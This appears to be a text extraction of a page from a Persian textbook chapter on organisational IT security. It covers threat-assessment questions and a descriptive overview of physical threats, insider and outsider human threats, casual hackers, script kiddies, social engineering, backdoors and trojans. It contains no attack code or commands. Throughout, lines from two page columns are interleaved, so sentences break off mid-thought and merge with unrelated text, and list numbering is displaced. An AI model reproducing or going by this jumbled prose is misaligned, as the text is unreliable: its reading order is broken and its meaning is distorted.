ﻲ ﺧﻄﺮﺍﺕ ﺑﺎﻟﻘﻮﺓ ﺍﻣﻨﻴﺘﻲ ﺗﻮﺳﻂ ﻣﺪﻳﺮﻳﺖ ،ﭘﺎﺳﺨﮕﻮﻳﻲ ﺑﻪ ﺷﻨﺎﺳﺎﻳ ﹺ ﺍﻣﺮﻭﺯ ﺑﺘﻮﺍﻥ ﻣﺤﺼﻮﻻﺕ ﺭﺍ ﺑﺮﺍﻱ ﺧﺮﻳﺪﺍﺭﺍﻥ ﺑﻪ ﺗﻤﺎﻣﻲ ﻧﻘﺎﻁ ﺩﻧﻴـﺎ
ﭘﻨﺞ ﺳﺌﻮﺍﻝ ﺯﻳﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ: ﺍﺭﺳﺎﻝ ﻛﺮﺩ .ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺑﻴﻦﺍﻟﻤﻠﻠـﻲ ﻣـﺪﻳﺮﺍﻥ ﺑﺎﻳـﺪ ﮔـﺴﺘﺮﻩﺍﻱ ﺍﺯ
ﺍﺻﻠﻲﺗﺮﻳﻦ ﻣﺤﺼﻮﻝ ﻳﺎ ﺧﺪﻣﺖ ﺳـﺎﺯﻣﺎﻥ ﭼﻴـﺴﺖ؟ ﺍﮔـﺮ .۱ ﻣﺨﺎﻃﺮﺍﺕ ﺭﺍ ﺑﺮﺍﻱ ﻣﺆﺳﺴﻪﻫﺎﻳﺸﺎﻥ ﺩﺭﻧﻈـﺮ ﺑﮕﻴﺮﻧـﺪ .ﺍﺯ ﺍﻧﺘﻬـﺎﻱ
ﭼﻨﺪ ﭘﺎﺳﺦ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﺳﻌﻲ ﻛﻨﻴﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﻭﻟﻮﻳـﺖﺑﻨـﺪﻱ ﺩﻫﺔ ۱۹۹۰ﺑﻪ ﺑﻌﺪ ﺣﻤـﻼﺕ ﺷـﺪﻳﺪ ﺑـﺴﻴﺎﺭﻱ ﺩﺭ ﺳﺮﺍﺳـﺮ ﺩﻧﻴـﺎ
ﻧﻤﺎﻳﻴﺪ. ﺻﻮﺭﺕ ﭘﺬﻳﺮﻓﺖ )ﻧﻈﻴﺮ ﺣﻤﻠﻪ ﺑﻪ ﻣﺮﻛﺰ ﺗﺠﺎﺭﺕ ﺟﻬـﺎﻧﻲ ﺩﺭ ﺳـﺎﻝ .(۲۰۰۱
ﻼ
ﺩﺭ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﭼﻨﻴﻦ ﺭﺧﺪﺍﺩﻫﺎﻳﻲ ،ﻧﻴﺎﺯ ﺑﻪ ﺍﻣﻨﻴـﺖ ﻓﻴﺰﻳﻜـﻲ ﻛـﺎﻣ ﹰ
ﻣﻨﺎﺑﻊ ﺍﺻﻠﻲ ﺩﺭﺁﻣﺪ ﻭ ﺭﺷﺪ ﺳﺎﺯﻣﺎﻥ ﻛﺪﺍﻣﻨﺪ؟ .۲
ﺭﻭﺷﻦ ﺷﺪ :ﺿﺮﻭﺭﺕ ﺣﻀﻮﺭ ﭘﻠﻴﺲ ﺩﺭ ﺍﻃﺮﺍﻑ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻛﻨﺘﺮﻝ
ﺳﺎﺧﺘﺎﺭ ﺳـﺎﺯﻣﺎﻥ ﭼﮕﻮﻧـﻪ ﺍﺳـﺖ؟ ﺑﺨـﺸﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﻭ .۳ ﻭﺭﻭﺩ ﺑﻪ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ،ﻃﺮﺍﺣﻲ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺻـﺤﻴﺢ ﺑـﺮﺍﻱ ﺗﺨﻠﻴـﺔ
ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﺍﺻﻠﻲ ﻫﺮﻳﻚ ﻛﺪﺍﻣﻨﺪ؟ ﺍﻳﻦ ﺑﺨﺸﻬﺎ ﭼﮕﻮﻧﻪ ﻣﺤﻴﻂ ﺩﺭﺻﻮﺭﺕ ﻭﻗـﻮﻉ ﺣﺎﺩﺛـﻪ ،ﻭ ﺗﻮﺳـﻌﻪ ﺩﺍﺩﻥ ﻧﻘـﺎﻁ ﺗﻤـﺎﺱ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﻛﻨﻨـﺪ؛ ﭼﮕﻮﻧـﻪ ﺑـﺎ ﻳﻜـﺪﻳﮕﺮ ﺍﺭﺗﺒـﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻣﻄﻤﺌﻦﺗﺮ ﺑﺎ ﻣﻘﺎﻣﺎﺕ ﻣﺤﻠﻲ ﻭ ﻛﺸﻮﺭﻱ.
ﻣﻲﻧﻤﺎﻳﻨﺪ؛ ﻭ ﭼﮕﻮﻧﻪ ﺑﻌﻨـﻮﺍﻥ ﻳـﻚ ﻣﺠﻤﻮﻋـﺔ ﻭﺍﺣـﺪ ﺑـﻪ
ﺩﺭ ﻗﺴﻤﺖ ﻓﻨﻲ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﻣﺘﻨﺎﻇﺮ ﺑﺮﺭﺳﻲ ﺗﻬﺪﻳـﺪﻫﺎﻳﻲ ﻛـﻪ ﺍﺯ
ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ؟
ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﻣﺘﻮﺟﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ،ﺑﺮﻧﺎﻣـﻪﻫـﺎﻱ
ﻛﺎﺭﺑﺮﺩﻱ ،ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺩﺍﺩﻩ ،ﻭ ﺷﺒﻜﻪﻫﺎﻳﻲ ﻛﻪ ﮔﺮﻭﻫﻬﺎ ﺭﺍ ﺑﻪ ﻫﻢ
ﺗﻬﺪﻳﺪﺍﺕ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﻛﺪﺍﻡ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﻱ ﻫﺮ ﺑﺨﺶ ﺣﺴﺎﺳﺘﺮ ﺍﺳﺖ ﻭ ﺍﺯ ﭼـﻪ .۴
ﻓﻨﺎﻭﺭﻳﻬﺎﻳﻲ ﺑﺮﺍﻱ ﺫﺧﻴﺮﻩ ﻭ ﺗﻮﺯﻳﻊ ﺍﻳﻦ ﺍﻃﻼﻋﺎﺕ ﺩﺭ ﺧﺎﺭﺝ
ﻧﻔﻮﺫ ﺑﻪ ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ؛ •
ﻭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؟
ﺑﺮﺍﻓﺰﺍﺭﻫﺎ )ﻭﻳﺮﻭﺳﻬﺎ ،ﺗﺮﺍﻭﺍﻫﺎ ،ﻛﺮﻣﻬﺎ(؛ •
ﺍﻧﺘﺸﺎﺭ ﻏﻴﺮﻣﺠﺎﺯ ﻳﺎ ﺗﺨﺮﻳﺐ ﺩﺍﺩﻩﻫﺎ؛ ﻭ • ﻣﺸﺘﺮﻳﺎﻥ ،ﺷـﺮﻛﺎ ﻭ ﻓﺮﻭﺷـﻨﺪﮔﺎﻥ ﺳـﺎﺯﻣﺎﻥ ﭼـﻪ ﻛـﺴﺎﻧﻲ .۵
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ﺑﻮﺳﻴﻠﺔ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ . • ﻫﺴﺘﻨﺪ ﻭ ﻧﺤﻮﺓ ﺗﻌﺎﻣﻞ ﺁﻧﻬﺎ ﺑﺎ ﺳﺎﺯﻣﺎﻥ ﭼﮕﻮﻧﻪ ﺍﺳﺖ؟
ﺍﺯ ﻣﻮﺿﻊ ﺗﻬﺪﻳﺪﺍﺕ ﺍﻧﺴﺎﻧﻲ ،ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻋﻮﺍﻣﻞ ﺧﺮﺍﺑﻜﺎﺭ ﺩﺍﺧﻠـﻲ ﺍﻃﻼﻋﺎﺕ ﻣـﻮﺭﺩ ﻧﻴـﺎﺯ ﺑـﺮﺍﻱ ﭘﺎﺳـﺦ ﺩﺍﺩﻥ ﺑـﻪ ﺍﻳـﻦ ﺳـﺆﺍﻻﺕ ﺭﺍ
ﻭ ﺧﺎﺭﺟﻲ ﺭﺍ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ .ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻘﺾ ﺍﻣﻨﻴﺖ ﺩﺍﺧﻠﻲ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﮔﻔﺘﮕﻮ ﺑﺎ ﻛﺎﺭﻣﻨﺪﺍﻥ )ﺑﺨﺼﻮﺹ ﻛﺎﺭﻛﻨـﺎﻥ ﺑﺨـﺶ ﻓﻨـﺎﻭﺭﻱ
ﻣﻲﺗﻮﺍﻧﺪ ﻧﺎﺷﻲ ﺍﺯ ﺧﻄﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺑﺎﺷﺪ :ﻳﻚ ﺳﻬﻞﺍﻧﮕﺎﺭﻱ ﺳﺎﺩﻩ، ﺍﻃﻼﻋﺎﺕ( ،ﻣﺪﻳﺮﺍﻥ ﻭ ﻫﻴﺄﺕ ﻣﺪﻳﺮﻩ ﺷﺮﻛﺖ ﺑﺪﺳﺖ ﺁﻭﺭﺩ .ﺍﺭﺯﻳـﺎﺑﻲ
ﺑﻲﺗﻮﺟﻬﻲ ،ﻳﺎ ﻋﺪﻡ ﺁﻣﻮﺯﺵ ﻛﺎﻓﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ .ﺩﺭ ﺣﻮﺯﻩﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻈﺮﺍﺕ ﻣﺸﺘﺮﻳﺎﻥ ﻭ ﻓﺮﻭﺷﻨﺪﮔﺎﻥ ﺩﺭ ﻣﻮﺭﺩ ﻣﺴﺎﺋﻞ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ
ﺑﺨــﺼﻮﺹ ﺟﺎﺳﻮﺳــﻲ ﺳــﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ ،ﻣــﻲﺗــﻮﺍﻥ ﺍﺯ ﻣﻬﻨﺪﺳــﻲ ﺍﺳﺖ ﻣﻨﺠﺮ ﺑﻪ ﻛﺸﻒ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺟﺪﻳـﺪ ﺷـﻮﺩ .ﺩﺳـﺖ ﺁﺧـﺮ
ﺍﺟﺘﻤﺎﻋﻲ ٥٦ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺴﻬﻴﻼﺕ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻭ ﺍﻳﻨﻜﻪ ﺗﻴﻤﻲ ﻛﻪ ﺑﻪ ﺟﻤـﻊﺁﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻣـﻲﭘـﺮﺩﺍﺯﺩ ﺑﺎﻳـﺪ ﺑـﺎ
ﻣﺤﺮﻣﺎﻧﺔ ﺍﻓﺮﺍﺩ ﺁﮔﺎﻩ ﺩﺍﺧﻞ ﺷﺮﻛﺖ ﺍﺳـﺘﻔﺎﺩﻩ ﻛـﺮﺩ .ﻣﺠﻤﻮﻋـﻪﺍﻱ ﺍﺩﺑﻴﺎﺕ ﮔﺰﺍﺭﺷﺎﺕ ﺭﺳﺎﻧﻪﻫﺎ ﺩﺭ ﻣﻮﺭﺩ ﺷﺮﻛﺖ ﺁﺷﻨﺎ ﺑﺎﺷـﺪ .ﻧﻈـﺮﺍﺕ
ﻣﻨﺎﺳﺐ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎ ﺑﺎﻳﺪ ﺗﻮﺳﻂ ﺑﺨـﺶ ﺍﻣﻨﻴـﺖ ﻭ ﺑـﺎ ﻫﻤﻜـﺎﺭﻱ ﻋﻤﻮﻣﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﺪ ﻣـﺆﺛﺮ ﺑﺎﺷـﺪ؛ ﺑﺨـﺼﻮﺹ ﺍﮔـﺮ ﺷـﺮﻛﺖ ﺩﺭ
ﺑﺨﺶ ﭘﺮﺳﻨﻠﻲ ﺍﻳﺠﺎﺩ ﺷﻮﻧﺪ ﺗﺎ ﺑﻪ ﻛﺎﻫﺶ ﺧﻄﺮﺍﺕ ﻛﻤﻚ ﻧﻤﺎﻳﻨﺪ. ﺻﻨﻌﺘﻲ ﺑﺤﺚﺍﻧﮕﻴﺰ ﻳﺎ ﺩﺭ ﺟﺎﻳﮕﺎﻫﻲ ﺣﺴﺎﺱ ﻓﻌﺎﻟﻴﺖ ﻛﻨـﺪ ،ﻭ ﻳـﺎ
ﺑﺨﺸﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻭ ﭘﺮﺳﻨﻠﻲ ﻫﻤﭽﻨـﻴﻦ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺩﺭ ﺭﻭﺍﻟﻬـﺎﻱ ﮔﺰﺍﺭﺷﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺁﻥ ﺑﺼﻮﺭﺕ ﻣﻨﻈﻢ ﺩﺭ ﻧﺸﺮﻳﺎﺕ ﻇـﺎﻫﺮ ﺷـﺪﻩ
ﺍﺳﺘﺨﺪﺍﻡ ﻭ ﺍﺧﺮﺍﺝ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﻤﻜﺎﺭﻱ ﻧﻤﺎﻳﻨﺪ .ﺍﮔﺮﭼـﻪ ﺑﺎﺷﺪ.
ﺩﺭ ﺑﺮﺧﻲ ﻣﻮﺍﺭﺩ ﻧﻤﻲﺗﻮﺍﻥ ﺍﻧﮕﻴﺰﺓ ﺷﻔﺎﻓﻲ ﺑﺮﺍﻱ ﺍﻋﻤﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧﻪ
ﻳﺎﻓﺖ ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻣﺘﻔﺎﻭﺕ ﺍﻳﻨﮕﻮﻧﻪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﻣﺨـﺮﺏ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺩﺷﻤﻦ ﺭﺍ ﺑﺸﻨﺎﺳﻴﻢ:
ﻧﻴﺎﺯ ﺑﻪ ﺗﻮﺿﻴﺢ ﻣﻔﺼﻞ ﺩﺍﺭﻧﺪ .ﺩﺳﺘﻪﺑﻨﺪﻱ ﻛﺴﺎﻧﻴﻜﻪ ﺑﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ
ﻧﻔﻮﺫ ﻣﻲﻛﻨﻨﺪ ﭼﻨﺪﺍﻥ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ ﻧﻴـﺴﺖ ،ﻭﻟـﻲ ﺑـﻪ ﻫـﺮ ﺗﺮﺗﻴـﺐ
ﺯﻣﺎﻧﻴﻜــﻪ ﺷــﺮﻛﺖ ﺳــﺎﺧﺘﺎﺭ ﻭ ﻋﻤﻠﻜــﺮﺩ ﺧــﻮﺩ ﺭﺍ ﺍﺭﺯﻳــﺎﺑﻲ ﻛــﺮﺩ،
ﻣﻲﺗﻮﺍﻥ ﺩﺭ ﻣﻮﺭﺩ ﺷﺪﺕ ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻣﺘﻨﺎﻇﺮﹰﺍ ﺁﺳﻴﺐ ﻣﻮﺭﺩ ﺍﻧﺘﻈـﺎﺭ
ﻣﻮﻗﻌﻴﺘﻲ ﻣﻨﺎﺳﺐ ﺑﺮﺍﻱ ﺗﺪﻭﻳﻦ ﺷﺮﺣﻲ ﺍﺯ ﻧﻘـﺎﻁ ﺑـﺎﻟﻘﻮﺓ ﻗـﻮﺕ ﻭ
ﻫﺮ ﺗﻬﺪﻳﺪ ﺑﺼﻮﺭﺕ ﻛﻠﻲ ﺑﺤﺚ ﻛﺮﺩ.
ﺿﻌﻒ ﺍﻣﻨﻴﺘﻲ ﺁﻥ ﺑﺪﺳـﺖ ﻣـﻲﺁﻳـﺪ .ﺩﺭ ﺍﺑﺘـﺪﺍ ﺑﻬﺘـﺮ ﺍﺳـﺖ ﺭﻭﻱ
ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ) ٥٧ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﺎﺑﺴﺘﺎﻧﻲ ،(٥٨ﻛﺎﺭﻣﻨﺪﺍﻥ ﻳﻚ ﺗﻬﺪﻳــﺪﺍﺕ ﻛﻠــﻲ ﻣﺘﻤﺮﻛــﺰ ﺷــﻮﻳﻢ .ﻫﻨﮕﺎﻣﻴﻜــﻪ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ
ﺳﺎﺯﻣﺎﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ ﺷـﺒﻜﻪ ﺁﺷـﻨﺎﻳﻲ ﺩﺍﺭﻧـﺪ .ﺍﻳـﻦ ﺷﻨﺎﺳﺎﻳﻲ ﺷﺪﻧﺪ ،ﺍﺭﺯﻳﺎﺑﻲ ﺳﻄﺢ ﺗﻬﺪﻳﺪﺍﺕ ﺩﺍﺧﻠـﻲ ﻭ ﺧـﺎﺭﺟﻲ ﺩﺭ
ﻻ ﻗـﺼﺪ ﺗﺨﺮﻳـﺐ ﺩﺍﺩﻩﻫـﺎ ﻭ ﺩﺍﺭﺍﺋﻴﻬـﺎﻱ ﺷـﺮﻛﺖ ﺭﺍ ﺍﻓﺮﺍﺩ ﻣﻌﻤـﻮ ﹰ ﻓﻌﺎﻟﻴـﺘﻬﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﺗﻬﺪﻳﺪﻫﺎ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﺧﻮﺍﻫﺪ
ﻧﺪﺍﺭﻧﺪ ،ﺍﻣﺎ ﺍﺯ ﺭﻭﻱ ﻛﻨﺠﻜﺎﻭﻱ ﺳﻌﻲ ﻣﻲﻛﻨﻨـﺪ ﺑـﻪ ﻣﻨـﺎﺑﻌﻲ ﻛـﻪ ﺑﻮﺩ.
ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ
ﺗﻬﺪﻳﺪﺍﺕ ﻛﻠﻲ ﻫﺮ ﺷﺮﻛﺖ ﻳﺎ ﺳﺎﺯﻣﺎﻥ ﺭﺳﻤﻲ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ:
ﻼ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺁﺷﻨﺎ ﻧﺒﺎﺷﻨﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳـﺖ ﺷﺎﻳﺪ ﻛﺎﻣ ﹰ
ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎﻋﺚ ﺗﺨﺮﻳﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺷﻮﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺍﮔـﺮ ﺗﻬﺪﻳﺪﺍﺕ ﻓﻴﺰﻳﻜﻲ
ﺍﺑﺰﺍﺭﻫﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ downloadﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ
ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ )ﺁﺗﺶﺳﻮﺯﻱ ،ﺯﻟﺰﻟﻪ ،ﻃﻮﻓﺎﻧﻬﺎﻱ ﺷﺪﻳﺪ ﻭ ﺳﻴﻞ(؛ •
ﺩﺭﺏ ﻣﺨﻔــﻲ ٥٩ﻳــﺎ ﺗــﺮﺍﻭﺍ ٦٠ﺑﺎﺷــﻨﺪ ﻛــﻪ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﻩ ﺩﻳﮕــﺮ
ﺩﺯﺩﻱ؛ •
ﻣﻬﺎﺟﻤﻴﻦ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﻟﺬﺍ ﻧﻔﻮﺫ ﺗﻔﻨﻨـﻲ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﺰﺭﮒ
ﺗﺨﺮﻳﺐ؛ •
ﺗﺪﺍﺧﻠﻬﺎﻱ ﻓﻴﺰﻳﻜﻲ؛ •
ﺗﺨﺮﻳﺐ ﺷﺒﻜﻪ؛ ﻭ •
56 Social Engineering
ﺟﺎﺳﻮﺳﻲ ﺳﺎﺯﻣﺎﻧﻴﺎﻓﺘﻪ. •
57 Casual Hackers
58 Summertime Hackers
59 Backdoor
60 Trojan
١٣٩ ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺩﺍﺭﺩ .ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﻋﻠﺖ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲﺷﺎﻥ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ، ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ ﻭ ﻣﻬﻤﺘﺮﻳﻦ ﺩﻟﻴﻞ ﻣﻤﻨﻮﻉ ﺑﻮﺩﻥ ﺁﻥ ﻧﻴﺰ ﻫﻤﻴﻦ
ﺍﺯ ﻟﺤﺎﻅ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ. ﺍﺳﺖ.
ﺩﺭ ﺩﺳﺘﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ،ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻋﻠﺖ ﺧـﺴﺘﮕﻲ ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺟـﻮﺍﻧﺘﺮ )ﺩﺭ ﺳـﻦ
""Script Kiddieﻫـﺎ ﻣﻌﻤـﻮ ﹰ
ﺍﺯ ﻛﺎﺭ ﻳﺎ ﺟﺬﺍﺑﻴﺘﻬﺎﻱ ﺭﻗﺎﺑﺖ ﻓﻨﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻣـﻲﻛﻨﻨـﺪ. ﺩﺑﻴﺮﺳﺘﺎﻥ ﻳﺎ ﭘﻴﺶﺩﺍﻧﺸﮕﺎﻫﻲ( ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﻮﺏ
ﮔﺮﻭﻫﻲ ﺩﻳﮕﺮ ﺑﺪﻧﺒﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺗﺮﻓﻴـﻊ ﻭ ﺩﺳـﺘﻤﺰﺩ ﻭ ﺍﻭﻗﺎﺕ ﺑﻴﻜﺎﺭﻱ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﭼﻨﺪﺍﻥ ﺧﺒﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺑـﺮﺍﻱ
ﻫﻤﻜﺎﺭﺍﻥ ﻳﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻫـﺴﺘﻨﺪ .ﺑﻌـﻀﻲ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ ﺍﻧﺠﺎﻡ ﻧﻔﻮﺫ ﺍﺯ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ
ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﺗﻼﻓﻲ ﺟﻮﻳﺎﻧﻪ ﻋﻠﻴﻪ ﺳﺎﺯﻣﺎﻥ ﺑـﻪ ﺍﻳـﻦ ﻣﻲﻛﻨﻨﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ )ﻛﻪ
ﻋﻤﻞ ﺩﺳﺖ ﺑﺰﻧﻨﺪ؛ ﻳﺎ ﺑﺎﻋﺚ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪﺍﻱ ﺷـﻮﻧﺪ ﻛـﻪ ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤـﻴﻦ ﻣﻄﻠـﺐ ﺑﺮﺭﺳـﻲ ﺷـﺪﻩ( ،ﺑـﺮ ﺭﻭﻱ ﺗﺨﺮﻳـﺐ ﻣﺘﻤﺮﻛـﺰ
ﻋﻠﺖ ﺁﻥ ﻋﺪﻡ ﺣﻔﺎﻇﺖ ﺻﺤﻴﺢ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﺁﻣﻮﺯﺵ ﻓﻨﻲ ﻧﻤﻲﺷﻮﻧﺪ ﺍﻣﺎ ﺗﻌﺪﺍﺩ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻭ ﮔﺎﻫﻲ ﺑﻪ ﺻﻮﺭﺕ ﺗﻴﻤﻲ ﻛﺎﺭ
ﻧﺎﻗﺺ ﻳﺎ ﺑﻲﺩﻗﺘﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﺷﺪ. ﻣﻲﻛﻨﻨﺪ ﻭ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻦ ﻗﺎﻟـﺐ ﺗﻬﺪﻳـﺪ ﺑﺰﺭﮔﺘـﺮﻱ ﺑـﻪ ﺣـﺴﺎﺏ
ﻫﺮﻳــﻚ ﺍﺯ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ ﺑــﺎﻟﻘﻮﺓ ﺍﻧــﺴﺎﻧﻲ ﺑــﺮﺍﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻣﻲﺁﻳﻨﺪ"Script Kiddie" .ﻫﺎ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺧـﻮﺩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻭ ﺍﺯ
ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺳﻄﺢ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﻭ ﻲ
ﺁﻥ ﻃﺮﻳﻖ ﺍﺩﻋﺎﻱ ﺷﻬﺮﺕ ﻣﻲﻛﻨﻨـﺪ .ﺩﺭ ﻭﺍﻗـﻊ ﺁﻧﻬـﺎ ﺑـﻪ ﺑـﺪﻧﺎﻣ ﹺ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﻴـﺎﺯ ﺍﺳـﺖ. ﺣﺎﺻﻞ ﺍﺯ ﺣﺠﻢ ﺯﻳﺎﺩ ﺣﻤﻼﺕ ﺧﻮﺩ ﺍﻓﺘﺨﺎﺭ ﻣـﻲﻛﻨﻨـﺪ .ﺑـﻪ ﻋﻠـﺖ
ﺑﺨﺶ ﺳﻮﻡ
